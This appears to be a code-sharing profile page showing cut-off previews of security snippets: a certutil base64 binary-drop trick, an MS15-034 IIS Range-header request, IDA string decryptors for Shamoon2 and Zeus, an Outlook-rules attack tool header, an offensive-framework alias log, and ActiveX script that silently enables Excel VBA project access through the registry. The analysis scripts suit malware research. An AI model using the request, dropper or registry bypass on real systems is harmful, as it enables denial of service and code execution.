Kaicastledine

echo -----BEGIN CERTIFICATE----- > encoded.txt
echo Just Base64 encode your binary data
echo TVoAAA== >> encoded.txt
echo -----END CERTIFICATE----- >> encoded.txt
certutil -decode encoded.txt decoded.bin

Kaicastledine

powershell -com {$wr=[Net.WebRequest]::Create('http://127.0.0.1/iisstart.htm');$wr.AddRange('bytes',18,18446744073709551615);$wr.GetResponse();$wr.close()}

Kaicastledine

# Sends a CVE-2015-1635 / MS15-034 Request and checks for vulnerability
function TestMS15_034($hostname, $port) 
{
	if ($port -eq $null)
	{
		$port = 80
	}
    
	$tc = New-Object Net.Sockets.TcpClient
	

Kaicastledine

import idc

def decrypt_n_comment(func, func_name):
	"""
	Decrypt and comment Shamoon2's strings
	"""
	data = {}

	for xref in XrefsTo(LocByName(func_name)):
		# init

Kaicastledine

def decrypt(func):
	"""
	Decryption of zeus strings
	"""
	ZBOT_INDEX_MIN = 0x0
	ZBOT_INDEX_MAX = 0xe7
	data = {}
	
	for i in range(ZBOT_INDEX_MIN, ZBOT_INDEX_MAX):
 

Kaicastledine

#!/usr/bin/env python
# Rulz.py
# Author: Nick Landers (@monoxgas) - Silent Break Security

import os
import sys
import argparse
import re
import binascii
import codecs

Kaicastledine

21:25:59>> aliases
[21:25:59] ID: 331 'aliases' started [target: z0.0.0.1]
acquiretoken         : LOCAL            : script _AcquireToken.dss %%cmd_args%%
acquiretoken         : ANY_REMOTE       : script _AcquireToken.dss %%cmd_args%%
arparp               : LOCAL            : python windows/arparp.py -args " %%cmd_args%% " -project Ops
arparp               : ANY_REMOTE       : python windows/arparp.py -args " %%cmd_args%% " -project Ops
channels             : LOCAL            : commands %%cmd_args%%
channels             : ANY_REMOTE       : commands %%cmd_args%%
checkpsp             : LOCAL            : python windows/checkpsp.py -args " %%cmd_args%% " -project Ops
checkpsp             : ANY_REMOTE       : python windows/checkpsp.py -args " %%cmd_args%% " -project Ops

Kaicastledine

Keybase proof

I hereby claim:

• I am kaicastledine on github.
• I am kcsec (https://keybase.io/kcsec) on keybase.
• I have a public key ASCJYGqbSLo24CpFzGCUtCpDq4hMus71-wEju9tIkcDr9Ao

To claim this, I am signing this object:

Kaicastledine

<html>
	<head>
		<script>
			var objExcel = new ActiveXObject("Excel.Application");
			objExcel.Visible = false;
			var WshShell = new ActiveXObject("WScript.Shell");
			var Application_Version = objExcel.Version;//Auto-Detect Version
			var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
			WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
			var objWorkbook = objExcel.Workbooks.Add();

Kaicastledine

<html>
	<head>
		<script>
			var objExcel = new ActiveXObject("Excel.Application");
			objExcel.Visible = false;
			var WshShell = new ActiveXObject("WScript.Shell");
			var Application_Version = objExcel.Version;//Auto-Detect Version
			var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
			WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
			var objWorkbook = objExcel.Workbooks.Add();